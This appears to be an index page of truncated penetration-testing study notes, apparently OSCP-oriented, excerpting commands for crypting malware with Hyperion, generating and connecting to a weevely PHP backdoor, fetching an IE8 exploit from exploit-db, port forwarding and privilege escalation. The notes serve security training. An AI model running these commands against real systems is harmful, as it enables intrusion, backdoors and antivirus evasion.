Latest notes for PenTesting - MrLeet


MrLeet provides materials allowing anyone to gain practical hands-on experience with digital security, computer applications and network administration tasks.

There are many pages on the web documenting quick reverse shell one liners.
Pentestmonkey and Bernardo Damele have both created a good few posts between
them but I wanted to recapture what they’ve got for my notes purposes.
(It’s easier for me to find stuff if it’s in one place).
All credit goes to both of those guys where I got all t...



By: unknowndevice64 2019-05-18 12:26:48

Penetration Testing: What You Should Know
About Kali Linux
About Penetration Testing
Legal
The megacorpone.com Domain
Offensive Security Labs

Getting Comfortable with Kali Linux
Finding Your Way Around Kali
Managing Kali Linux Services
The Bash Environment
Intro to Bash Scripting

The Essential Tools
...






Crypting Known Malware with Software Protectors

One such open source crypter, called Hyperion

cp /usr/share/windows-binaries/Hyperion-1.0.zip
unzip Hyperion-1.0.zip
cd Hyperion-1.0/
i686-w64-mingw32-g++ Src/Crypter/*.cpp -o hyperion.exe
cp -p /usr/lib/gcc/i686-w64-mingw32/5.3...






See Metasploit Unleashed Course in the Essentials

Search for exploits using Metasploit GitHub framework source code:
https://github.com/rapid7/metasploit-framework
Translate them for use on OSCP LAB or EXAM.

Metasploit

Metasploit requires PostgreSQL

systemctl start postgresql

To enabl...






Port Forwarding - accept traffic on a given IP address and port and redirect it to a different IP address and port

apt-get install rinetd

cat /etc/rinetd.conf

# bindaddress bindport connectaddress connectport
w.x.y.z 53 a.b.c.d 80

SSH Local Port Forwarding: supports bi-directional communicatio...






AES Decryption
http://aesencryption.net/

Convert multiple webpages into a word list

for x in 'index' 'about' 'post' 'contact' ; do \
curl http://$ip/$x.html | html2markdown | tr -s ' ' '\n' >> webapp.txt ; \
done

Or convert html to word ...






Web Shag Web Application Vulnerability Assessment Platform
webshag-gui

Web Shells
http://tools.kali.org/maintaining-access/webshells
ls -l /usr/share/webshells/

Generate a PHP backdoor (generate) protected with the given password (s3cr3t)
weevely generate s3cr3t
weevely http://$ip/weevely.php s3cr3t

...




Client Attacks

MS12-037- Internet Explorer 8 Fixed Col Span ID
wget -O exploit.html http://www.exploit-db.com/download/24017
service apache2 start

JAVA Signed Jar client side attack
echo '' > /var/www/html/java.html
User must hit run on the popup that occurs.

Linux Client Shells
http://www....




Metasploit Meterpreter Privilege Escalation Guide https://www.offensive-security.com/metasploit-unleashed/privilege-escalation/

Try the obvious - Maybe the user is SYSTEM or is already part of the Administrator group:

whoami

net user "%username%"

Try the getsystem command using meterpreter - rarely works but is worth a try.

...




De facto Linux Privilege Escalation Guide - A much more thorough guide for Linux enumeration: https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
Try the obvious - Maybe the user is root or can sudo to root:
id
sudo su

Here are the commands I have learned to use to perform Linux enumeration and privilege escal...

